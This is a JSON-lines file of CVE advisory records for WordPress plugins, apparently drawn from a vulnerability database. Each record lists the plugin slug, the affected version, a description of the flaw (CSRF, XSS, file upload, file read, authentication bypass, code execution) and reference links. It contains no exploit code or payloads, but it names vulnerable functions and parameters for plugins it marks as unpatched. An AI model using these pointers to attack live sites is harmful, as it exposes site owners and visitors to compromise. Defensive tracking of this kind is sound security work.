{"CVE_ID":"CVE-2024-6860","slug":"wp-multitasking","versionImpact":"0.1.12","description":"The WP MultiTasking  WordPress plugin through 0.1.12 does not have CSRF check when updating its permalink suffix settings, which could allow attackers to make logged admins perform such action via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1d09d3dd-aa49-4ff1-80e7-6d176e378916\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1d09d3dd-aa49-4ff1-80e7-6d176e378916\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7685","slug":"like-share-my-site","versionImpact":"0.2","description":"The Like & Share My Site plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 0.2. This is due to missing or incorrect nonce validation on the 'lsms_admin' page. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/like-share-my-site\\\/trunk\\\/lsms.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/like-share-my-site\\\/trunk\\\/lsms.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5f126296-0a6e-4d47-8f1a-ce2aa097f21d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5f126296-0a6e-4d47-8f1a-ce2aa097f21d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1172","slug":"bookly-responsive-appointment-booking-tool","versionImpact":"21.5","description":"The Bookly plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the full name value in versions up to, and including, 21.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c3efbd9d-e2b5-4915-a964-29a49c7fba86?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c3efbd9d-e2b5-4915-a964-29a49c7fba86?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2876981%40bookly-responsive-appointment-booking-tool&new=2876981%40bookly-responsive-appointment-booking-tool&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2876981%40bookly-responsive-appointment-booking-tool&new=2876981%40bookly-responsive-appointment-booking-tool&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2414","slug":"meeting-scheduler-by-vcita","versionImpact":"4.2.10","description":"The Online Booking & Scheduling Calendar for WordPress by vcita plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the vcita_save_settings_callback function in versions up to, and including, 4.2.10. This makes it possible for authenticated attackers with minimal permissions, such as a subscriber, to modify the plugins settings, upload media files, and inject malicious JavaScript.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/meeting-scheduler-by-vcita\\\/trunk\\\/vcita-ajax-function.php#L88\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/meeting-scheduler-by-vcita\\\/trunk\\\/vcita-ajax-function.php#L88\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.jonh.eu\\\/blog\\\/security-vulnerabilities-in-wordpress-plugins-by-vcita\",\"name\":\"https:\\\/\\\/blog.jonh.eu\\\/blog\\\/security-vulnerabilities-in-wordpress-plugins-by-vcita\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3c99aab5-a995-44ae-bc14-09f73e6b22c5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3c99aab5-a995-44ae-bc14-09f73e6b22c5?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4423","slug":"rays-grid","versionImpact":"1.2.2","description":"The RAYS Grid plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.2.2. This is due to missing or incorrect nonce validation on the rsgd_insert_update() function. This makes it possible for unauthenticated attackers to update post fields via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e5911815-db53-46f2-a16d-ed21be20bbfb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e5911815-db53-46f2-a16d-ed21be20bbfb?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2572600\\\/rays-grid\\\/trunk\\\/includes\\\/class-db.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2572600\\\/rays-grid\\\/trunk\\\/includes\\\/class-db.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-1538","slug":"theme-demo-import","versionImpact":"1.1.1","description":"Theme Demo Import WordPress plugin before 1.1.1 does not validate the imported file, allowing high-privilege users such as admin to upload arbitrary files (such as PHP) even when FILE_MODS and FILE_EDIT are disallowed.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b19adf7c-3983-487b-9b46-0f2922b08c1c\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b19adf7c-3983-487b-9b46-0f2922b08c1c\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1907","slug":"categorify","versionImpact":"1.0.7.4","description":"The Categorify plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.7.4. This is due to missing or incorrect nonce validation on the categorifyAjaxDeleteCategory function. This makes it possible for unauthenticated attackers to delete categories via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/08c79118-9dad-44fd-b683-7950276d3808?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/08c79118-9dad-44fd-b683-7950276d3808?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3034410\\\/categorify\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3034410\\\/categorify\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0757","slug":"insert-or-embed-articulate-content-into-wordpress","versionImpact":"4.3000000023","description":"The Insert or Embed Articulate Content into WordPress plugin through 4.3000000023 is not properly filtering which file extensions are allowed to be imported on the server, allowing the uploading of malicious code within zip files","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/eccd017c-e442-46b6-b5e6-aec7bbd5f836\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/eccd017c-e442-46b6-b5e6-aec7bbd5f836\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6023","slug":"contentlock","versionImpact":"1.0.3","description":"The ContentLock WordPress plugin through 1.0.3 does not have CSRF check in place when adding emails, which could allow attackers to make a logged in admin perform such action via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6e812189-2980-453d-931d-1f785e8dbcc0\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6e812189-2980-453d-931d-1f785e8dbcc0\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6315","slug":"blox-page-builder","versionImpact":"1.0.65","description":"The Blox Page Builder plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'handleUploadFile' function in all versions up to, and including, 1.0.65. This makes it possible for authenticated attackers, with contributor-level and above permissions, to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0fe551db-2073-4eeb-83da-9ce8c2c031e1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0fe551db-2073-4eeb-83da-9ce8c2c031e1?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/blox-page-builder\\\/trunk\\\/inc_php\\\/unitecreator_assets.class.php?rev=1866874#L979\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/blox-page-builder\\\/trunk\\\/inc_php\\\/unitecreator_assets.class.php?rev=1866874#L979\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6929","slug":"dynamic-featured-image","versionImpact":"3.7.0","description":"The Dynamic Featured Image plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018dfiFeatured\u2019 parameter in all versions up to, and including, 3.7.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6700e926-21c1-45c9-bca9-62ef0218e998?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6700e926-21c1-45c9-bca9-62ef0218e998?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dynamic-featured-image\\\/trunk\\\/dynamic-featured-image.php#L434\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dynamic-featured-image\\\/trunk\\\/dynamic-featured-image.php#L434\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dynamic-featured-image\\\/trunk\\\/dynamic-featured-image.php#L469\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dynamic-featured-image\\\/trunk\\\/dynamic-featured-image.php#L469\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/dynamic-featured-image\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/dynamic-featured-image\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9224","slug":"hello-world","versionImpact":"2.1.1","description":"The Hello World plugin for WordPress is vulnerable to Arbitrary File Reading in all versions up to, and including, 2.1.1 via the hello_world_lyric() function. This makes it possible for authenticated attackers, with subscriber-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2f58df1f-66f7-4e3d-af6d-08174653a2ad?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2f58df1f-66f7-4e3d-af6d-08174653a2ad?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hello-world\\\/tags\\\/2.1.1\\\/hello-world.php#L35\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hello-world\\\/tags\\\/2.1.1\\\/hello-world.php#L35\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hello-world\\\/tags\\\/2.1.1\\\/hello-world.php#L113\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hello-world\\\/tags\\\/2.1.1\\\/hello-world.php#L113\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-49322","slug":"jemployee","versionImpact":"1.0","description":"Incorrect Privilege Assignment vulnerability in CodePassenger Job Board Manager for WordPress allows Privilege Escalation.This issue affects Job Board Manager for WordPress: from n\/a through 1.0.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/jemployee\\\/wordpress-job-board-manager-for-wordpress-plugin-1-0-privilege-escalation-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/jemployee\\\/wordpress-job-board-manager-for-wordpress-plugin-1-0-privilege-escalation-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10284","slug":"ce21-suite","versionImpact":"2.2.0","description":"The CE21 Suite plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 2.2.0. This is due to hardcoded encryption key in the 'ce21_authentication_phrase' function. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the email.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/45d66743-300e-480d-98b8-99dc30b6e786?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/45d66743-300e-480d-98b8-99dc30b6e786?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ce21-suite\\\/trunk\\\/single-sign-on-ce21.php?rev=3097700#L242\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ce21-suite\\\/trunk\\\/single-sign-on-ce21.php?rev=3097700#L242\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10961","slug":"oa-social-login","versionImpact":"5.9.0","description":"The Social Login plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 5.9.0. This is due to insufficient verification on the user being returned by the social login token. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the email and the user does not have an already-existing account for the service returning the token.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/oa-social-login\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/oa-social-login\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/43a64074-ca64-4c34-b467-06d1ad8c5aa0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/43a64074-ca64-4c34-b467-06d1ad8c5aa0?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12260","slug":"custom-wp-rest-api","versionImpact":"2.2.2","description":"The Ultimate Endpoints With Rest Api plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'page' parameter in all versions up to, and including, 2.2.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/custom-wp-rest-api\\\/trunk\\\/admin\\\/api_log_display.php#L146\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/custom-wp-rest-api\\\/trunk\\\/admin\\\/api_log_display.php#L146\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f36df17d-4633-42e0-b106-908b994d8cb7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f36df17d-4633-42e0-b106-908b994d8cb7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13670","slug":"music-sheet-viewer","versionImpact":"4.1","description":"The Music Sheet Viewer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'pn_msv' shortcode in all versions up to, and including, 4.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/music-sheet-viewer\\\/trunk\\\/music-sheet-viewer.php#L395\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/music-sheet-viewer\\\/trunk\\\/music-sheet-viewer.php#L395\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8ec4eb8a-7b03-4392-9137-4f17622bfe54?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8ec4eb8a-7b03-4392-9137-4f17622bfe54?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0805","slug":"mortgage-loan-calculator","versionImpact":"1.5.20","description":"The Mortgage Calculator \/ Loan Calculator plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'mlcalc' shortcode in all versions up to, and including, 1.5.20 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mortgage-loan-calculator\\\/tags\\\/1.5.20\\\/en\\\/forms.inc.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mortgage-loan-calculator\\\/tags\\\/1.5.20\\\/en\\\/forms.inc.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mortgage-loan-calculator\\\/tags\\\/1.5.20\\\/mlcalc.php#L62\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mortgage-loan-calculator\\\/tags\\\/1.5.20\\\/mlcalc.php#L62\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1a8ca426-34cd-4c98-ae24-f3f31a7fcae5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1a8ca426-34cd-4c98-ae24-f3f31a7fcae5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6857","slug":"wp-multitasking","versionImpact":"0.1.12","description":"The WP MultiTasking  WordPress plugin through 0.1.12 does not have CSRF check when updating its Header, Footer and Body Script Settings, which could allow attackers to make logged admins perform such action via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/97636602-2dd0-465b-b6dc-acb42147edb3\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/97636602-2dd0-465b-b6dc-acb42147edb3\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4403","slug":"drag-and-drop-multiple-file-upload-for-woocommerce","versionImpact":"1.1.6","description":"The Drag and Drop Multiple File Upload for WooCommerce plugin for WordPress is vulnerable to arbitrary file uploads in all versions up to, and including, 1.1.6 due to accepting a user-supplied supported_type string and the uploaded filename without enforcing real extension or MIME checks within the upload() function. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/drag-and-drop-multiple-file-upload-for-woocommerce\\\/tags\\\/1.1.6\\\/inc\\\/class-dnd-upload-wc.php#L158\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/drag-and-drop-multiple-file-upload-for-woocommerce\\\/tags\\\/1.1.6\\\/inc\\\/class-dnd-upload-wc.php#L158\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/drag-and-drop-multiple-file-upload-for-woocommerce\\\/tags\\\/1.1.6\\\/inc\\\/class-dnd-upload-wc.php#L360\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/drag-and-drop-multiple-file-upload-for-woocommerce\\\/tags\\\/1.1.6\\\/inc\\\/class-dnd-upload-wc.php#L360\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3289478\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3289478\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/drag-and-drop-multiple-file-upload-for-woocommerce\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/drag-and-drop-multiple-file-upload-for-woocommerce\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/933dd704-5a31-42a9-9b87-bf14a9d4ffa9?source=cve\",\"name\":\"https:\\
\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/933dd704-5a31-42a9-9b87-bf14a9d4ffa9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4190","slug":"csv-mass-importer","versionImpact":"1.2","description":"The CSV Mass Importer WordPress plugin through 1.2 does not properly validate uploaded files, allowing high privilege users such as admin to upload arbitrary files on the server even when they should not be allowed to (for example in multisite setup)","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e525ece5-6e03-4aee-bf5b-6ae0b961f027\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e525ece5-6e03-4aee-bf5b-6ae0b961f027\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6213","slug":"fastcgi-cache-purge-and-preload-nginx","versionImpact":"2.1.1","description":"The Nginx Cache Purge Preload plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 2.1.1 via the 'nppp_preload_cache_on_update' function. This is due to insufficient sanitization of the $_SERVER['HTTP_REFERERER'] parameter passed from the 'nppp_handle_fastcgi_cache_actions_admin_bar' function. This makes it possible for authenticated attackers, with Administrator-level access and above, to execute code on the server.","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/psaux-it\\\/nginx-fastcgi-cache-purge-and-preload\",\"name\":\"https:\\\/\\\/github.com\\\/psaux-it\\\/nginx-fastcgi-cache-purge-and-preload\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/fastcgi-cache-purge-and-preload-nginx\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/fastcgi-cache-purge-and-preload-nginx\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bbe8c101-5e0a-4ba7-8ff7-4c8ed01e9ef5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bbe8c101-5e0a-4ba7-8ff7-4c8ed01e9ef5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1472","slug":"unusedcss","versionImpact":"1.7.1","description":"The RapidLoad Power-Up for Autoptimize plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.7.1. This is due to missing or incorrect nonce validation on its AJAX actions. This makes it possible for unauthenticated attackers to invoke those functions, via forged request granted they can trick a site administrator into performing an action such as clicking on a link. Actions include resetting the API key, accessing or deleting log files, and deleting cache among others.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/unusedcss\\\/tags\\\/1.7.1\\\/includes\\\/modules\\\/unused-css\\\/UnusedCSS_Admin.php#L70\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/unusedcss\\\/tags\\\/1.7.1\\\/includes\\\/modules\\\/unused-css\\\/UnusedCSS_Admin.php#L70\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8f9ee168-82b1-4d13-a84e-379f16dcb283?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8f9ee168-82b1-4d13-a84e-379f16dcb283?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
